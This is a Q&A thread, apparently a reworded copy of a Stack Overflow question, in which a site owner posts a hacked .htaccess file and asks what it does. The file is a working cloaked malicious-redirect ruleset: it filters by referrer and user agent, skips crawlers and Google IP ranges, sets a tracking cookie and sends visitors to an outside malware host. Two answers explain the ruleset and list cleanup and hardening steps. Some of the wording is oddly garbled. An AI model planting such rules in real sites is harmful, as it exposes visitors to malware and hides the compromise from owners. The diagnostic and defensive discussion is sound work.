Geek Answers Handbook

The htaccess client site is hacked - not quite sure what it does or what to do next

One of our customer sites has been hacked, and .htaccess files have been replaced with the following.

Can anyone break exactly what this does?

According to my information, it looks like he takes a referral page, then a user agent, sets a cookie called jpg, and then redirects you to siknsty.malicioussite.com, which then tries to download some malware before linking to the original referrers website ( this way your google path> malware page> google)

If the jpg cookie is set, it does not link to you anywhere, as it assumes that you have already downloaded the malware. (this may be wrong - I think it should link to the pages listed below where it redirects).

I am not sure about the rest or use .htaccess to mask zip files as jpg (I think I am reading this correctly) ...

Any ideas?

Also, any ideas how this came about on the server? Permissions for all were set to 0644, and this happened on both Windows and Linux servers under the same account.

Morning morning ballad ahoy.

Oh, and don’t go to this site.

<IfModule prefork.c> RewriteEngine On RewriteCond %{REQUEST_METHOD} ^GET$ RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)? (tweet|twit|linkedin|instagram|facebook\.|myspace\.|bebo\.).*$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(hi5\.|blogspot\.|friendfeed\.|friendster\.|google\.).*$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.).*$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.).*$ [NC,OR] RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(lycos\.|metacrawler\.|mail\.|pinterest|instagram).*$ [NC] RewriteCond %{HTTP_REFERER} !^.*(imgres).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|IRIX|Jakarta|JetBrains).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|macDN|Mediapartners|Megite|MetaProducts).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC] RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC] RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC] RewriteCond %{REMOTE_ADDR} !^66\.249.*$ [NC] RewriteCond %{REMOTE_ADDR} !^74\.125.*$ [NC] RewriteCond %{HTTP_COOKIE} !^.*Jpg.*$ [NC] RewriteCond %{HTTP_USER_AGENT} .*(Windows|Macintosh|iPad|iPhone|iPod|Android).* [NC] RewriteCond %{HTTPS} ^off$ RewriteRule .* - [E=Jpg:%{TIME_SEC}] RewriteRule .* - [E=HjT:siknsty.autoeventregistration.com] RewriteCond %{ENV:Jpg} 0 RewriteRule ^.* http://%{ENV:HjT}/lg.php?bannerid=2168&campaignid=1049&zoneid=54&loc=1&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=3dc202f6d9 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9516:/:0:HttpOnly] RewriteCond %{ENV:Jpg} 1 RewriteRule ^.* http://%{ENV:HjT}/www/app_full_proxy.php?app=275724075798066&v=1&size=z&cksum=e086bd606215518aed83711368bbecf5&src=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11607:/:0:HttpOnly] RewriteCond %{ENV:Jpg} 2 RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.3&utms=10&utmn=620248474&utmhn=malang.olx.co.id&utme=8(2!entryPage)9(2!jobs/staticsearch/190\%3Fsearchbox\%3Dretailer\%26section\%3Dst-190)11(2!1)&utmcs=UTF-8&utmsr=1024x768&utmvp=1024x638&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=10.3\%20r181&utmdt=Gambar\%20MAZDA\%20MR\%20TAHUN\%201992.\%20BIRU\%20-\%20Malang\%20-\%20Mobil&utmhid=312516024&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=vehicles/itemimages/withImg/0&utmac=UA-1240664-1&utmcc=__utma\%3D209359949.1036501994.1340939688.1340939688.1340955051.2\%3B\%2B__utmz\%3D209359949.1340955051.2.2.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dgambar\%2520mobil\%2520mazda\%2520th\%25201992\%3B&utmu=ujGgAAAAIAAAAAAAAAAAAAB~ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9398:/:0:HttpOnly] RewriteCond %{ENV:Jpg} 3 RewriteRule ^.* http://%{ENV:HjT}/_xhr/ugccomments/?method=get_context_uuid&context_id=8064b73e-890d-3876-9ce5-c5f7c98574aa&0.2617028157370842&baseurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9127:/:0:HttpOnly] RewriteCond %{ENV:Jpg} 4 RewriteRule ^.* http://%{ENV:HjT}/ping?h=thefrisky.com&p=/photos/357-12-stars-who-regret-having-plastic-surgery/lisa-rinna-lips-m-jpg-2/&u=i5r1cquurwfzcui1&d=thefrisky.com&g=25328&n=1&f=1&c=0&x=114&y=1865&w=638&j=45&R=1&W=0&I=0&E=0&v=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&b=4187&t=72n4jkji2m79sf6m&V=6&D=nygdmayh2yyvp9w3&i=12\%20Stars\%20Who\%20Regret\%20Having\%20Plastic\%20Surgery\%20Lisa\%20Rinna\%20\%E2\%80\%93\%20The\%20Frisky&_ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11948:/:0:HttpOnly] RewriteCond %{ENV:Jpg} 5 RewriteRule ^.* http://%{ENV:HjT}/__utm.gif?utmwv=5.3.2&utms=3&utmn=490784565&utmhn=www.wego.co.id&utme=8(2!Hotels*Google\%20search\%20position)9(2!Details\%20Overview*5)&utmcs=UTF-8&utmsr=1024x768&utmvp=1007x612&utmsc=24-bit&utmul=en-us&utmje=0&utmfl=11.2\%20r202&utmdt=Aston\%20Cengkareng\%20City\%20Hotel\%20\%26\%20Conference\%20Center\%2C\%20Jakarta\%20-\%20Bandingkan\%20tarif\%20kamar\%20-\%20Wego.co.id&utmhid=1324439502&utmr=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&utmp=/hotel/indonesia/jakarta/aston-cengkareng-city-hotel-and-conference-center--133090&utmac=UA-29994605-1&utmcc=__utma\%3D1.786375144.1340094774.1340094774.1340094774.1\%3B\%2B__utmz\%3D1.1340094774.1.1.utmcsr\%3Dgoogle\%7Cutmccn\%3D(organic)\%7Cutmcmd\%3Dorganic\%7Cutmctr\%3Dstandard\%2520superior\%2520twin\%2520room\%2520aston\%2520hotel\%3B&utmu=qzGggCAAAAAAAAAAAAAAAAB~ [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10955:/:0:HttpOnly] RewriteCond %{ENV:Jpg} 6 RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=30550&campaignid=4402&zoneid=1917&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=dbd1f7d293 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9621:/:0:HttpOnly] RewriteCond %{ENV:Jpg} 7 RewriteRule ^.* http://%{ENV:HjT}/api/getCount2.php?cb=stButtons.processCB&refDomain=www.mangahere.com&refQuery=manga/fly_high/v03/c013/37.html&pgurl=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&pubKey=e47efe7d-147b-4731-ac42-9838ccdc52f2&url=http\%3A\%2F\%2F%{HTTP_HOST}\%2F [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:10798:/:0:HttpOnly] RewriteCond %{ENV:Jpg} 8 RewriteRule ^.* http://%{ENV:HjT}/pingjs/?k=f6ckilz7r2ss&t=Komik\%20Fairy\%20Tail\%20\%7C\%20Chapter\%20288\%20289\%20Hal\%2016\%20-\%20Baca\%20Manga\%20Bahasa\%20Indonesia\%20Online&c=s&y=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&a=-1&r=978836 [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:11234:/:0:HttpOnly] <!-- Conditions 10 - 58 removed to post on stackoverflow --> RewriteCond %{ENV:Jpg} 59 RewriteRule ^.* http://%{ENV:HjT}/delivery/lg.php?bannerid=31662&campaignid=2&zoneid=1884&channel_ids=,&loc=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&referer=http\%3A\%2F\%2F%{HTTP_HOST}\%2F&cb=af167e7f1f [R=302,NE,L,CO=Jpg:%{ENV:Jpg}:%{HTTP_HOST}:9285:/:0:HttpOnly] </IfModule> #a77342b1677255ef6afc9a0dbec166f633c2b44166559458c71fb4e7
+7
source share
2 answers

He selects one of the redirects randomly for the second time. Hence why they go from 0 to 59.

I think you are right that he sets a cookie so that he does not do the same again with the same victim.

The first group of rules performs actions such as deleting anyone who requests a file ending in .jpg, .zip, etc., possibly to make sure that someone is really looking at the browser before redirecting it. User agents are also exceptions (pay attention to! At the beginning of each line) - various web spiders, as well as some operating systems and clients that he is not interested in or cannot infect. It also requires the user agent to include one of

 Windows|Macintosh|iPad|iPhone|iPod|Android

and the referrer is one of a long list of names of popular sites and search engines. This could be again to make sure that the person is behind the browser if they get paid for spam, or it could be related to using your site, for example, for a click farm.

An interesting one is the list of IP blocks that it ignores:

 RewriteCond %{REMOTE_ADDR} !^66\.249.*$ [NC] RewriteCond %{REMOTE_ADDR} !^74\.125.*$ [NC]

These may include site addresses, so site owners (potentially) do not notice the damage, or this may give you an idea of ​​what country your attackers are in.

+8
source

Instead of being a direct / default attack, this is a tricky way to seamlessly introduce malware, which is not obvious to the end user.

It seems like it is cycling through time ... (which you obviously somehow understand):

  • Take the site until you understand it.
  • Compare / Restore from the latest backup and see what else has been changed on your system.
  • Check log files
  • Lock all accounts on the server and select all passwords.

There are several possible ways this happened, including:

  • The server account was forcibly forced (for example, ftp / telnet / user or another shared account).
  • Your code provided / created a loophole through which someone gained access (although if your permissions are set to 644, then they probably got access to the root / user account, or they won’t be able to overwrite the files).
  • Used outdated software (with protective holes).
  • Piggy-backed on an insecure user account session

Here are some common elements to help avoid such exploits, although you can find online security methods to block linux / win servers:

  • Installing triggers on key system files (one open source option: http://www.tripwire.org/ )
  • Installing software / security updates ( Secunia is a long-standing source of new problems)
  • Delete / stop all unnecessary accounts / services
  • Using equipment at the edge of your network to protect your servers from external access (such as a router with intelligent security features - although it's expensive)
  • Blocking access to the server from static IP ranges other than the ones you use
  • Conduct penetration testing to find the weaknesses that your servers have and their closure.
  • Remove external access by blocking account attempts after n attempts using iptables or equivalent
+2
source

More articles:


All Articles